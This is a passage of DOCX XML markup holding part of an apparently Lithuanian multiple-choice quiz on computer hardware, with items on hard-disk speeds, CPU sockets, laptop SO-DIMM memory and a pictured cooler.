        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>c) ATA, USB, PS/2</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D749EA4" w14:textId="77777777" w:rsidR="0003195F" w:rsidRPr="005A5C28" w:rsidRDefault="0003195F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49191711" w14:textId="6F47E12D" w:rsidR="008F4F2D" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>urioje</w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> eilutėje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>yra</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>išvardinti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3E2B94F4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>kompiuterių</w:t>
      </w:r>
      <w:r w:rsidR="7BC177BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5EFA1AEC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="6EEC45FB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>HDD</w:t>
      </w:r>
      <w:r w:rsidR="6C3DC699" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> kietųjų diskų apsisukimų grei</w:t>
      </w:r>
      <w:r w:rsidR="2CA5F7A8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>čiai</w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>? Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001EEDB5" w14:textId="66A5F92B" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a) 5400, 7200 rpm</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D91DA9F" w14:textId="0854E75A" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>b) 5400, 7200, 10000 rpm</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7CE380" w14:textId="3C3C1D6B" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>c) 5400, 7200, 10000, 12500 rpm</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0712BCD2" w14:textId="77777777" w:rsidR="0003195F" w:rsidRPr="005A5C28" w:rsidRDefault="0003195F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15307048" w14:textId="7D873EAB" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Pagal k</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>urį</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> pirminį parametrą procesorius</w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> derinamas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> su sistemine plokšte?</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E503845" w14:textId="20FBA8CB" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">a) </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>peratyviosios atminties palaikomą kiekį</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668B9F28" w14:textId="4D74BC59" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>agal jungtį (</w:t>
      </w:r>
      <w:r w:rsidR="001D0831" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">angl. - </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>socket)</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1565B78C" w14:textId="335A1788" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">c) </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>agal gamintoją (pvz., Intel procesoriams parenkamos Asus plokštės)</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3BEA53" w14:textId="77777777" w:rsidR="0003195F" w:rsidRPr="005A5C28" w:rsidRDefault="0003195F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14BF8DF5" w14:textId="28620A92" w:rsidR="008F4F2D" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Vadovaudamiesi kompiuterio atminties klasifikacija pagal korpuso konstrukciją nustatykite</w:t>
      </w:r>
      <w:r w:rsidR="00847EC6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>atmintį,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>kuri</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B71969" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>įdiegiama į</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2182B5BC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>nešioja</w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>mus</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4EFD6FEB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>kompiuteri</w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>us. Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649D345A" w14:textId="08022AC6" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a) DIMM</w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEE48C4" w14:textId="562FA587" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>b) SO</w:t>
      </w:r>
      <w:r w:rsidR="117DD1C3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>DIMM</w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396A92DF" w14:textId="7CEDFD56" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>c) DDR, DDR2, DDR3</w:t>
      </w:r>
      <w:r w:rsidR="62333E82" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>, DDR4</w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A50349B" w14:textId="77777777" w:rsidR="0003195F" w:rsidRPr="005A5C28" w:rsidRDefault="0003195F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48913EAB" w14:textId="47174D1E" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>5. Koki</w:t>
      </w:r>
      <w:r w:rsidR="00B71969" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B71969" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>kompiuterio</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>detal</w:t>
      </w:r>
      <w:r w:rsidR="00B71969" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ę matote piešinyje</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> apačioje</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teis</w:t>
      </w:r>
      <w:r w:rsidR="004A54E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ngą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071DEECE" w14:textId="6438A153" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="0BED17C9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51086965" wp14:editId="12814D18">
            <wp:extent cx="1826624" cy="795867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="182966488" name="Paveikslėlis 18296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29664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6624" cy="795867"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AD0E31" w14:textId="16048712" w:rsidR="72A21A35" w:rsidRPr="005A5C28" w:rsidRDefault="72A21A35" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1 pav. Aušintuvas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C82A67" w14:textId="579C19BC" w:rsidR="72A21A35" w:rsidRPr="005A5C28" w:rsidRDefault="72A21A35" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis</w:t>
      </w:r>
      <w:r w:rsidR="2B9C5C25" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="1644CE98" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DeepCool V65.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1644CE98" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
